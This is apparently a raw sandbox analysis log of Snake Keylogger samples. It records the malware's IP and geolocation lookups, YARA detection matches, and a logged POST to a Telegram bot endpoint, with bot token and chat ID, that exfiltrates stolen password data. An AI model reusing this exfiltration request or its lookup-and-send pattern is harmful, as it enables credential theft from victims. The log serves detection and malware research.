              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.7:49704 version: TLS 1.0
              Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.7:49713 version: TLS 1.0
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
              Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
              Source: global trafficDNS traffic detected: DNS query: api.telegram.org
              Source: global trafficDNS traffic detected: DNS query: 15.164.165.52.in-addr.arpa
              Source: unknownHTTP traffic detected: POST /bot6724182006:AAFoGlHe55KNUX6Demve5eHbGqhBzYsvQQc/sendDocument?chat_id=5535403842&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dcac7a674eafb1Host: api.telegram.orgContent-Length: 551Connection: Keep-Alive
              Source: rPO0977-6745.exe, 0000000A.00000002.3693243826.00000000031E6000.00000004.00000800.00020000.00000000.sdmp, EDyxAgkldisLe.exe, 00000017.00000002.3693041192.0000000002A55000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.telegram.org
              Source: rPO0977-6745.exe, 0000000A.00000002.3693243826.0000000003088000.00000004.00000800.00020000.00000000.sdmp, rPO0977-6745.exe, 0000000A.00000002.3693243826.00000000030A3000.00000004.00000800.00020000.00000000.sdmp, rPO0977-6745.exe, 0000000A.00000002.3693243826.00000000030DF000.00000004.00000800.00020000.00000000.sdmp, rPO0977-6745.exe, 0000000A.00000002.3693243826.000000000307B000.00000004.00000800.00020000.00000000.sdmp, rPO0977-6745.exe, 0000000A.00000002.3693243826.0000000003096000.00000004.00000800.00020000.00000000.sdmp, rPO0977-6745.exe, 0000000A.00000002.3693243826.00000000030D0000.00000004.00000800.00020000.00000000.sdmp, rPO0977-6745.exe, 0000000A.00000002.3693243826.0000000002FE8000.00000004.00000800.00020000.00000000.sdmp, EDyxAgkldisLe.exe, 00000017.00000002.3693041192.0000000002943000.00000004.00000800.00020000.00000000.sdmp, EDyxAgkldisLe.exe, 00000017.00000002.3693041192.00000000028FB000.00000004.00000800.00020000.00000000.sdmp, EDyxAgkldisLe.exe, 00000017.00000002.3693041192.0000000002909000.00000004.00000800.00020000.00000000.sdmp, EDyxAgkldisLe.exe, 00000017.00000002.3693041192.000000000285B000.00000004.00000800.00020000.00000000.sdmp, EDyxAgkldisLe.exe, 00000017.00000002.3693041192.00000000028EE000.00000004.00000800.00020000.00000000.sdmp, EDyxAgkldisLe.exe, 00000017.00000002.3693041192.0000000002952000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.com
              Source: rPO0977-6745.exe, 0000000A.00000002.3693243826.0000000002FDC000.00000004.00000800.00020000.00000000.sdmp, rPO0977-6745.exe, 0000000A.00000002.3693243826.0000000003088000.00000004.00000800.00020000.00000000.sdmp, rPO0977-6745.exe, 0000000A.00000002.3693243826.00000000030A3000.00000004.00000800.00020000.00000000.sdmp, rPO0977-6745.exe, 0000000A.00000002.3693243826.00000000030B1000.00000004.00000800.00020000.00000000.sdmp, rPO0977-6745.exe, 0000000A.00000002.3693243826.00000000030DF000.00000004.00000800.00020000.00000000.sdmp, rPO0977-6745.exe, 0000000A.00000002.3693243826.000000000307B000.00000004.00000800.00020000.00000000.sdmp, rPO0977-6745.exe, 0000000A.00000002.3693243826.000000000302B000.00000004.00000800.00020000.00000000.sdmp, rPO0977-6745.exe, 0000000A.00000002.3693243826.0000000003096000.00000004.00000800.00020000.00000000.sdmp, rPO0977-6745.exe, 0000000A.00000002.3693243826.00000000030D0000.00000004.00000800.00020000.00000000.sdmp, rPO0977-6745.exe, 0000000A.00000002.3693243826.0000000002FE8000.00000004.00000800.00020000.00000000.sdmp, EDyxAgkldisLe.exe, 00000017.00000002.3693041192.0000000002943000.00000004.00000800.00020000.00000000.sdmp, EDyxAgkldisLe.exe, 00000017.00000002.3693041192.000000000284F000.00000004.00000800.00020000.00000000.sdmp, EDyxAgkldisLe.exe, 00000017.00000002.3693041192.0000000002924000.00000004.00000800.00020000.00000000.sdmp, EDyxAgkldisLe.exe, 00000017.00000002.3693041192.00000000028FB000.00000004.00000800.00020000.00000000.sdmp, EDyxAgkldisLe.exe, 00000017.00000002.3693041192.0000000002909000.00000004.00000800.00020000.00000000.sdmp, EDyxAgkldisLe.exe, 00000017.00000002.3693041192.000000000289E000.00000004.00000800.00020000.00000000.sdmp, EDyxAgkldisLe.exe, 00000017.00000002.3693041192.000000000285B000.00000004.00000800.00020000.00000000.sdmp, EDyxAgkldisLe.exe, 00000017.00000002.3693041192.00000000028EE000.00000004.00000800.00020000.00000000.sdmp, EDyxAgkldisLe.exe, 00000017.00000002.3693041192.0000000002952000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
              Source: rPO0977-6745.exe, 0000000A.00000002.3693243826.0000000002F21000.00000004.00000800.00020000.00000000.sdmp, EDyxAgkldisLe.exe, 00000017.00000002.3693041192.0000000002791000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
              Source: rPO0977-6745.exe, 00000000.00000002.1265815072.00000000041F9000.00000004.00000800.00020000.00000000.sdmp, rPO0977-6745.exe, 0000000A.00000002.3686100091.0000000000402000.00000040.00000400.00020000.00000000.sdmp, EDyxAgkldisLe.exe, 0000000B.00000002.1307021274.0000000003A5D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/q
              Source: EDyxAgkldisLe.exe, 00000017.00000002.3693041192.0000000002909000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.orgh
              Source: rPO0977-6745.exe, 0000000A.00000002.3699929015.0000000006720000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://microsoft.co
              Source: rPO0977-6745.exe, 0000000A.00000002.3693243826.0000000003088000.00000004.00000800.00020000.00000000.sdmp, rPO0977-6745.exe, 0000000A.00000002.3693243826.00000000030A3000.00000004.00000800.00020000.00000000.sdmp, rPO0977-6745.exe, 0000000A.00000002.3693243826.00000000030DF000.00000004.00000800.00020000.00000000.sdmp, rPO0977-6745.exe, 0000000A.00000002.3693243826.000000000307B000.00000004.00000800.00020000.00000000.sdmp, rPO0977-6745.exe, 0000000A.00000002.3693243826.0000000003096000.00000004.00000800.00020000.00000000.sdmp, rPO0977-6745.exe, 0000000A.00000002.3693243826.00000000030D0000.00000004.00000800.00020000.00000000.sdmp, rPO0977-6745.exe, 0000000A.00000002.3693243826.0000000003000000.00000004.00000800.00020000.00000000.sdmp, EDyxAgkldisLe.exe, 00000017.00000002.3693041192.0000000002943000.00000004.00000800.00020000.00000000.sdmp, EDyxAgkldisLe.exe, 00000017.00000002.3693041192.00000000028FB000.00000004.00000800.00020000.00000000.sdmp, EDyxAgkldisLe.exe, 00000017.00000002.3693041192.0000000002909000.00000004.00000800.00020000.00000000.sdmp, EDyxAgkldisLe.exe, 00000017.00000002.3693041192.00000000028EE000.00000004.00000800.00020000.00000000.sdmp, EDyxAgkldisLe.exe, 00000017.00000002.3693041192.0000000002873000.00000004.00000800.00020000.00000000.sdmp, EDyxAgkldisLe.exe, 00000017.00000002.3693041192.0000000002952000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://reallyfreegeoip.org
              Source: rPO0977-6745.exe, 00000000.00000002.1265411156.0000000003191000.00000004.00000800.00020000.00000000.sdmp, rPO0977-6745.exe, 0000000A.00000002.3693243826.0000000002F21000.00000004.00000800.00020000.00000000.sdmp, EDyxAgkldisLe.exe, 0000000B.00000002.1306085363.0000000002A3D000.00000004.00000800.00020000.00000000.sdmp, EDyxAgkldisLe.exe, 00000017.00000002.3693041192.0000000002791000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: rPO0977-6745.exe, EDyxAgkldisLe.exe.0.drString found in binary or memory: http://tempuri.org/DataSet1.xsd
              Source: rPO0977-6745.exe, 0000000A.00000002.3693243826.00000000031E6000.00000004.00000800.00020000.00000000.sdmp, EDyxAgkldisLe.exe, 00000017.00000002.3693041192.0000000002A55000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
              Source: EDyxAgkldisLe.exe, 00000017.00000002.3693041192.0000000002A55000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
              Source: EDyxAgkldisLe.exe, 00000017.00000002.3693041192.0000000002A55000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot6724182006:AAFoGlHe55KNUX6Demve5eHbGqhBzYsvQQc/sendDocument?chat_id=5535
              Source: rPO0977-6745.exe, 0000000A.00000002.3693243826.0000000003088000.00000004.00000800.00020000.00000000.sdmp, rPO0977-6745.exe, 0000000A.00000002.3693243826.00000000030A3000.00000004.00000800.00020000.00000000.sdmp, rPO0977-6745.exe, 0000000A.00000002.3693243826.00000000030DF000.00000004.00000800.00020000.00000000.sdmp, rPO0977-6745.exe, 0000000A.00000002.3693243826.000000000307B000.00000004.00000800.00020000.00000000.sdmp, rPO0977-6745.exe, 0000000A.00000002.3693243826.000000000302B000.00000004.00000800.00020000.00000000.sdmp, rPO0977-6745.exe, 0000000A.00000002.3693243826.0000000003096000.00000004.00000800.00020000.00000000.sdmp, rPO0977-6745.exe, 0000000A.00000002.3693243826.00000000030D0000.00000004.00000800.00020000.00000000.sdmp, rPO0977-6745.exe, 0000000A.00000002.3693243826.0000000002FE8000.00000004.00000800.00020000.00000000.sdmp, EDyxAgkldisLe.exe, 00000017.00000002.3693041192.0000000002943000.00000004.00000800.00020000.00000000.sdmp, EDyxAgkldisLe.exe, 00000017.00000002.3693041192.00000000028FB000.00000004.00000800.00020000.00000000.sdmp, EDyxAgkldisLe.exe, 00000017.00000002.3693041192.0000000002909000.00000004.00000800.00020000.00000000.sdmp, EDyxAgkldisLe.exe, 00000017.00000002.3693041192.000000000289E000.00000004.00000800.00020000.00000000.sdmp, EDyxAgkldisLe.exe, 00000017.00000002.3693041192.000000000285B000.00000004.00000800.00020000.00000000.sdmp, EDyxAgkldisLe.exe, 00000017.00000002.3693041192.00000000028EE000.00000004.00000800.00020000.00000000.sdmp, EDyxAgkldisLe.exe, 00000017.00000002.3693041192.0000000002952000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
              Source: rPO0977-6745.exe, 00000000.00000002.1265815072.00000000041F9000.00000004.00000800.00020000.00000000.sdmp, rPO0977-6745.exe, 0000000A.00000002.3686100091.0000000000402000.00000040.00000400.00020000.00000000.sdmp, rPO0977-6745.exe, 0000000A.00000002.3693243826.0000000002FE8000.00000004.00000800.00020000.00000000.sdmp, EDyxAgkldisLe.exe, 0000000B.00000002.1307021274.0000000003A5D000.00000004.00000800.00020000.00000000.sdmp, EDyxAgkldisLe.exe, 00000017.00000002.3693041192.000000000285B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
              Source: EDyxAgkldisLe.exe, 00000017.00000002.3693041192.0000000002952000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.33
              Source: rPO0977-6745.exe, 0000000A.00000002.3693243826.0000000003088000.00000004.00000800.00020000.00000000.sdmp, rPO0977-6745.exe, 0000000A.00000002.3693243826.00000000030A3000.00000004.00000800.00020000.00000000.sdmp, rPO0977-6745.exe, 0000000A.00000002.3693243826.00000000030DF000.00000004.00000800.00020000.00000000.sdmp, rPO0977-6745.exe, 0000000A.00000002.3693243826.000000000307B000.00000004.00000800.00020000.00000000.sdmp, rPO0977-6745.exe, 0000000A.00000002.3693243826.000000000302B000.00000004.00000800.00020000.00000000.sdmp, rPO0977-6745.exe, 0000000A.00000002.3693243826.0000000003096000.00000004.00000800.00020000.00000000.sdmp, rPO0977-6745.exe, 0000000A.00000002.3693243826.00000000030D0000.00000004.00000800.00020000.00000000.sdmp, EDyxAgkldisLe.exe, 00000017.00000002.3693041192.0000000002943000.00000004.00000800.00020000.00000000.sdmp, EDyxAgkldisLe.exe, 00000017.00000002.3693041192.00000000028FB000.00000004.00000800.00020000.00000000.sdmp, EDyxAgkldisLe.exe, 00000017.00000002.3693041192.0000000002909000.00000004.00000800.00020000.00000000.sdmp, EDyxAgkldisLe.exe, 00000017.00000002.3693041192.000000000289E000.00000004.00000800.00020000.00000000.sdmp, EDyxAgkldisLe.exe, 00000017.00000002.3693041192.00000000028EE000.00000004.00000800.00020000.00000000.sdmp, EDyxAgkldisLe.exe, 00000017.00000002.3693041192.0000000002952000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.33$
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
              Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
              Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
              Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
              Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
              Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
              Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
              Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
              Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49735 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49741 version: TLS 1.2

              System Summary

              barindex
              Source: 11.2.EDyxAgkldisLe.exe.3a7de48.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 11.2.EDyxAgkldisLe.exe.3a7de48.2.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 11.2.EDyxAgkldisLe.exe.3a7de48.2.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 11.2.EDyxAgkldisLe.exe.3a7de48.2.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
              Source: 0.2.rPO0977-6745.exe.41f9670.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 0.2.rPO0977-6745.exe.41f9670.3.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 0.2.rPO0977-6745.exe.41f9670.3.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 0.2.rPO0977-6745.exe.41f9670.3.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
              Source: 11.2.EDyxAgkldisLe.exe.3a5d428.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 11.2.EDyxAgkldisLe.exe.3a5d428.1.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 11.2.EDyxAgkldisLe.exe.3a5d428.1.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 11.2.EDyxAgkldisLe.exe.3a5d428.1.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
              Source: 0.2.rPO0977-6745.exe.421a090.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 0.2.rPO0977-6745.exe.421a090.2.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 0.2.rPO0977-6745.exe.421a090.2.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 0.2.rPO0977-6745.exe.421a090.2.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
              Source: 11.2.EDyxAgkldisLe.exe.3a7de48.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 11.2.EDyxAgkldisLe.exe.3a7de48.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 0.2.rPO0977-6745.exe.421a090.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 11.2.EDyxAgkldisLe.exe.3a7de48.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 11.2.EDyxAgkldisLe.exe.3a7de48.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
              Source: 0.2.rPO0977-6745.exe.421a090.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 0.2.rPO0977-6745.exe.421a090.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 0.2.rPO0977-6745.exe.421a090.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
              Source: 0.2.rPO0977-6745.exe.41f9670.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 0.2.rPO0977-6745.exe.41f9670.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 0.2.rPO0977-6745.exe.41f9670.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 0.2.rPO0977-6745.exe.41f9670.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
              Source: 11.2.EDyxAgkldisLe.exe.3a5d428.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 11.2.EDyxAgkldisLe.exe.3a5d428.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 11.2.EDyxAgkldisLe.exe.3a5d428.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 11.2.EDyxAgkldisLe.exe.3a5d428.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
              Source: 0000000A.00000002.3686100091.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 0000000A.00000002.3686100091.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
              Source: 00000000.00000002.1265815072.00000000041F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 00000000.00000002.1265815072.00000000041F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
              Source: 0000000B.00000002.1307021274.0000000003A5D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 0000000B.00000002.1307021274.0000000003A5D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
              Source: Process Memory Space: rPO0977-6745.exe PID: 1540, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: Process Memory Space: rPO0977-6745.exe PID: 1540, type: MEMORYSTRMatched rule: Detects Snake Keylogger Author: ditekSHen
              Source: Process Memory Space: rPO0977-6745.exe PID: 2916, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: Process Memory Space: rPO0977-6745.exe PID: 2916, type: MEMORYSTRMatched rule: Detects Snake Keylogger Author: ditekSHen
              Source: Process Memory Space: EDyxAgkldisLe.exe PID: 7276, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: Process Memory Space: EDyxAgkldisLe.exe PID: 7276, type: MEMORYSTRMatched rule: Detects Snake Keylogger Author: ditekSHen
              Source: 0.2.rPO0977-6745.exe.7820000.5.raw.unpack, SizeParameters.csLarge array initialization: : array initializer size 15921
              Source: 0.2.rPO0977-6745.exe.31b9118.0.raw.unpack, SizeParameters.csLarge array initialization: : array initializer size 15921
              Source: C:\Users\user\Desktop\rPO0977-6745.exeProcess Stats: CPU usage > 49%
